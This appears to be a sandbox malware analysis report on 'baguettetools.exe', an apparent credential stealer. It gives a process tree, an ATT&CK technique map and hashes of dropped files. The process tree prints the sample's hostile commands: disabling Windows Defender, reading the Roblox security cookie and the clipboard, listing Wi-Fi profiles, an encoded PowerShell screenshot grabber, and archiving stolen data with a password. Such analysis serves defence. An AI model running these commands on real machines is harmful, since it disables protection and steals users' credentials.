C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6876

C:\Users\Admin\Downloads\baguettetools.exe
"C:\Users\Admin\Downloads\baguettetools.exe"
1⤵
- Executes dropped EXE
PID:6088
- C:\Users\Admin\Downloads\baguettetools.exe
  "C:\Users\Admin\Downloads\baguettetools.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:6804

C:\Users\Admin\Downloads\baguettetools.exe
"C:\Users\Admin\Downloads\baguettetools.exe"
1⤵
- Executes dropped EXE
PID:5892
- C:\Users\Admin\Downloads\baguettetools.exe
  "C:\Users\Admin\Downloads\baguettetools.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3820

C:\Users\Admin\Downloads\baguettetools.exe
"C:\Users\Admin\Downloads\baguettetools.exe"
1⤵
- Executes dropped EXE
PID:6464
- C:\Users\Admin\Downloads\baguettetools.exe
  "C:\Users\Admin\Downloads\baguettetools.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:6124

C:\Users\Admin\Downloads\baguettetools.exe
"C:\Users\Admin\Downloads\baguettetools.exe"
1⤵
- Executes dropped EXE
PID:116
- C:\Users\Admin\Downloads\baguettetools.exe
  "C:\Users\Admin\Downloads\baguettetools.exe"
  2⤵
  - Executes dropped EXE
  PID:3848

C:\Users\Admin\Downloads\baguettetools.exe
"C:\Users\Admin\Downloads\baguettetools.exe"
1⤵
- Executes dropped EXE
PID:6932
- C:\Users\Admin\Downloads\baguettetools.exe
  "C:\Users\Admin\Downloads\baguettetools.exe"
  2⤵
  - Executes dropped EXE
  PID:3748

C:\Users\Admin\Downloads\baguettetools.exe
"C:\Users\Admin\Downloads\baguettetools.exe"
1⤵
- Executes dropped EXE
PID:5164
- C:\Users\Admin\Downloads\baguettetools.exe
  "C:\Users\Admin\Downloads\baguettetools.exe"
  2⤵
  - Executes dropped EXE
  PID:5280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\baguettetools.exe'"
    3⤵
    PID:5472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\baguettetools.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:5660
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5200
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:6712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:6460
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:6608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:6560
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:6564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5772
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:6148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5808
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5736
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:5780
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:6876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5124
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:6668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:6052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      PID:6704
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pjyxg2il\pjyxg2il.cmdline"
        5⤵
        
        PID:3280
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F15.tmp" "c:\Users\Admin\AppData\Local\Temp\pjyxg2il\CSC6DBD12D086BF4017896BEA458469A819.TMP"
        6⤵
        
        PID:1032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5548
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5872
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6900
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5796
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5924
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:7024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4988
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI51642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\VuDk2.zip" *"
    3⤵
    PID:2520
  - - C:\Users\Admin\AppData\Local\Temp\_MEI51642\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI51642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\VuDk2.zip" *
      4⤵
      PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:6028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4520

C:\Users\Admin\Downloads\baguettetools.exe
"C:\Users\Admin\Downloads\baguettetools.exe"
1⤵
PID:4984
- C:\Users\Admin\Downloads\baguettetools.exe
  "C:\Users\Admin\Downloads\baguettetools.exe"
  2⤵
  PID:2916

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9e3fc58a8fb86c93d19e1500b873ef6f

SHA1
c6aae5f4e26f5570db5e14bba8d5061867a33b56

SHA256
828f4eacac1c40b790fd70dbb6fa6ba03dcc681171d9b2a6579626d27837b1c4

SHA512
e5e245b56fa82075e060f468a3224cf2ef43f1b6d87f0351a2102d85c7c897e559be4caeaecfdc4059af29fdc674681b61229319dda95cb2ee649b2eb98d313e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
27304926d60324abe74d7a4b571c35ea

SHA1
78b8f92fcaf4a09eaa786bbe33fd1b0222ef29c1

SHA256
7039ad5c2b40f4d97c8c2269f4942be13436d739b2e1f8feb7a0c9f9fdb931de

SHA512
f5b6181d3f432238c7365f64fc8a373299e23ba8178bcc419471916ef8b23e909787c7c0617ab22e4eb90909c02bd7b84f1386fbc61e2bdb5a0eb474175da4bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\66dac86c-a0f6-47f4-a338-79dbdcd2beb9.tmp

Filesize
6KB

MD5
bc7163cbef3016a089769cc963b9fc41

SHA1
dcdc58d25227f6c37220cf553c95110c43cd3a36

SHA256
b69163ce397bc45f0d32dfa6362ef0adb68d855be4a56cdaf14321aa7936b180

SHA512
8c4abc9396d915ba5bd929f175a707d3a28e67740169d382c53ee6f31467b99b4a9fd853eb3cb93eac7aa644a5c6a87d251bfd53da6daff533642dea76723b61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
f33e10568629852664bbd7d7f2cde5a4

SHA1
3c1f114ecfa4867d6d7530947d3fc7cdb1b109f9

SHA256
7876e8e1be54db5e2378f09706c85f195b288d9e8eb4c19a0d4bce3cc763dec5

SHA512
0099789bedc9bfb78849e5b5e50e76125340f368ce1c2efd25d5c8811521b9670b35b6c42199049219af43985f66d68276eccc5e8c08ab93b9d0d8ef3104acd7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
105B

MD5
66f8dd72513b99b659f5e96ad284fa79

SHA1
7b366941103b7ea4d48cc4938b8fcbd4533a7bd4

SHA256
6bf4fb19d63e66a4f6dba1efd2439bc73ca21670030550a5682b323fdcac2176

SHA512
aa7710ad8714c96f975645acd0cf2a9613b320210ba3457039f85f1291af965c1e5fbe63f85576eaf36e3aed652f9c385b5a188565d4bb18f3e1b42f6e4d44a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
048f1e3823d4d314e2da477719aa7723

SHA1
f251832779915b684863debb06089d25ef7b7465

SHA256
6e0d71af346e0be2b4dccb156028903001c0c1fa1c0751a39518b01cf9f5be06

SHA512
162bd78a11e03446403097d89fcdf755cec7ca662ec0d0ce08388a8643b58bed9532f8137190605a5e51a58dbfb284ced95a8c8057b77f34770acd9e8aa265ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
90640a5644f6652dc94d988e8484b863

SHA1
7fc7c2a8ec1ded8ea61a8db6ec338290a6814500

SHA256
4de0688c052fb8bbd17de1d1381de1242eb199c4e71ec8a8abd532498411bc2e

SHA512
2474563c8561314882a950aac8a3c3f01a5619927e7f1ace4df5629527d4e776ba537b1e87a1f268436f4a96514944c315c014b8366866f753e26160c1f6f109

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
ea63262ff191e85490abbfeb02c0b21f

SHA1
fcf2e6dd18892352ec8090122f270dda72a4004b

SHA256
d526eb5bc2929987616e3a7f76720128e498613b5a490577857ed09a9fca60ca

SHA512
9e1f131b2511d63697c91324d1bac221ddf12ec514ae383aa4a8161f18418d0e2619969e19d1382848aa24ab9140220309171890671ce98790baefb885c0b48c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57eaae.TMP

Filesize
48B

MD5
be8a71971811c6205ba9fc3f89afc4b4

SHA1
0d78eec8cd4bf1d4694bc299ba733336ae2e5382

SHA256
d5f83c33f00619c98469f9a39c4629e48c7f5802a54672fa5e18559c6e7ba9c3

SHA512
2b91182b5cbafe69d77c5bb50c4147c970f4c5a8aeeef0a2d707e14191fb925919b8a3e27addd85dc2ae9e87a42c3edec5b8ae95d18893f05b7ef15f6dd43ca9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
